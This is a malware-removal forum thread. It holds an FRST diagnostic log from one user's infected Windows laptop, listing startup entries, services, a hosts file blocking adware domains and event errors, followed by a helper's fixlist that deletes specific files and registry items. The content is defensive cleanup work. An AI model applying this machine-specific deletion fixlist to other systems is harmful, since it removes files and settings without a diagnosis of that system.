2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-03-29 18:45 - 2016-03-27 00:55 - 02140824 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-29 18:45 - 2016-03-27 00:55 - 00097944 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-11-17 13:44 - 2015-11-17 13:44 - 00117248 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libaacdec.dll
2015-11-17 13:45 - 2015-11-17 13:45 - 00234496 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libmpgdec.dll
2015-11-17 13:45 - 2015-11-17 13:45 - 00253440 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libid3tag.dll
2015-11-17 13:44 - 2015-11-17 13:44 - 00344064 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libaudioenc.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
05-04-2016 13:18:41 Scheduled Checkpoint
09-04-2016 10:34:10 Installed TurboTax 2015 wrapper
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/09/2016 04:29:02 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:29:02 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:51 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:51 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:41 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:41 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:31 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:31 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:27 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (04/09/2016 04:28:27 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
Error: (04/09/2016 04:27:45 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:21:26 PM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/09/2016 04:21:22 PM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/09/2016 04:20:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/09/2016 04:20:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 60%
Total physical RAM: 3885.5 MB
Available physical RAM: 1542.19 MB
Total Virtual: 3885.5 MB
Available Virtual: 579.16 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 

#8 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
    •  
  • Gender:Male
  • Location:Germany
  • Local time:02:32 PM

Posted 12 April 2016 - 03:43 AM

Hello,

Toffee is not available, so I will help you...
 

***


Copy FRST / FSRT64.exe to your desktop!

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt 



start
CreateRestorePoint:
CloseProcesses:
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
U3 idsvc; no ImagePath 
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] 
U3 wpcsvc; no ImagePath
C:\ProgramData\WceNM3o.dat 
C:\Users\RoNiN\autoplaylist.dat 
C:\Users\RoNiN\cddbcontrol.dll 
C:\Users\RoNiN\cddblink.dll 
C:\Users\RoNiN\cddbmusicid.dll 
C:\Users\RoNiN\convert.exe 
C:\Users\RoNiN\dbghelp.dll 
C:\Users\RoNiN\dunzip32.dll 
C:\Users\RoNiN\fixrjb.exe 
C:\Users\RoNiN\hxaudiodevicehook.dll 
C:\Users\RoNiN\ierjplug.dll 
C:\Users\RoNiN\keys.dat 
C:\Users\RoNiN\mc_enc_h263.dll 
C:\Users\RoNiN\mediainfo.dll 
C:\Users\RoNiN\mmcdda32.dll 
C:\Users\RoNiN\rdsf3260.dll 
C:\Users\RoNiN\realcleaner.exe 
C:\Users\RoNiN\realconverter.exe 
C:\Users\RoNiN\realjbox.exe 
